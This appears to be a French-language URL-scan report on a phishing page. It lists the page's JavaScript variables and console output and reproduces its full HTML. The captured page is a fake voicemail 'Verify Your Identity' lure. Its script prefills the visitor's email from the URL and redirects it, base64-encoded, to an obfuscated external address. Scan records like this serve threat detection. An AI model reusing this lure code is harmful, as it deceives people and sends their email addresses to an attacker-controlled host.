- ID de l'analyse :
- 4574d8a3-e310-459c-929a-30e78aa2166cTerminée
- URL soumise :
- https://contactmanagement-hubarchivesync.xeoncomputers.com/api/
- Fin du rapport :
Liens : 0 trouvé(s)
Liens sortants identifiés à partir de la page
Variables JavaScript : 5 trouvée(s)
Les variables JavaScript globales chargées dans l'objet fenêtre d'une page sont des variables déclarées en dehors des fonctions et accessibles depuis n'importe quel endroit du code au sein du champ d'application actuel
Nom | Type |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
continueLoading | function |
validateEmail | function |
Messages de journal de console : 1 trouvé(s)
Messages consignés dans la console web
Type | Catégorie | Enregistrement |
---|---|---|
error | network |
|
HTML
Le corps HTML de la page en données brutes
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Verify Your Identity</title>
<style>
body {
font-family: "Segoe UI", sans-serif;
background-color: #f4f4f4;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
margin: 0;
color: #333;
}
.container {
background-color: white;
border: 1px solid #ccc;
border-radius: 5px;
padding: 20px;
width: 90%;
max-width: 350px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
text-align: center;
}
.container img {
width: 80px;
margin-bottom: 15px;
}
.container h2 {
font-size: 20px;
color: #333;
margin-bottom: 15px;
}
.container p {
color: #666;
margin-bottom: 10px;
font-size: 14px;
}
.container input[type="email"] {
width: 100%;
padding: 10px;
border: 1px solid #ccc;
border-radius: 5px;
font-size: 14px;
box-sizing: border-box;
margin-bottom: 20px;
text-align: center;
}
.container button {
width: 100%;
padding: 10px;
background-color: #0078d4;
color: white;
border: none;
border-radius: 5px;
font-size: 16px;
cursor: pointer;
}
.container button:hover {
background-color: #005a9e;
}
.container .footer {
font-size: 12px;
color: #888;
margin-top: 20px;
}
</style>
</head>
<body>
<div class="container">
<img src="https://cabertel.com/images/voicemail.jpg" "="" alt="New Recording">
<h2>Verify Your Identity</h2>
<p><strong>You've received a new voicemail.</strong></p>
<p>Please verify your Organization email address to access it.</p>
<form id="verification-form">
<label for="email-input" class="visually-hidden">Email Address:</label>
<input id="email-input" type="email" placeholder="Enter email" required="">
<button type="submit">Next</button>
</form>
</div>
<script>
document.addEventListener('DOMContentLoaded', function() {
const emailInput = document.getElementById('email-input');
const hash = window.location.hash.substring(1); // Get hash from URL
const email = decodeURIComponent(atob(hash)); // Decode email from base64
if (validateEmail(email)) {
emailInput.value = email;
}
});
function continueLoading() {
const email = document.getElementById('email-input').value.trim().toLowerCase();
if (validateEmail(email)) {
const encodedLink = "aHR0cHM6Ly9pcmFlc3RhdGUuY29tL20vP2MzWTliek0yTlY4eFgyNXZiU1p5WVc1a1BXUXhXazlYYWswOUpuVnBaRDFWVTBWU01ERXhNakl3TWpSVk5EWXhNakF4TXpV"; // Encoded URL
const link = atob(encodedLink) + "=N0123N" + btoa(email);
window.location.href = link;
} else {
alert("Please enter a valid email.");
}
}
function validateEmail(email) {
const re = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
return re.test(email);
}
document.getElementById('verification-form').addEventListener('submit', function(event) {
event.preventDefault();
continueLoading();
});
</script>
</body></html>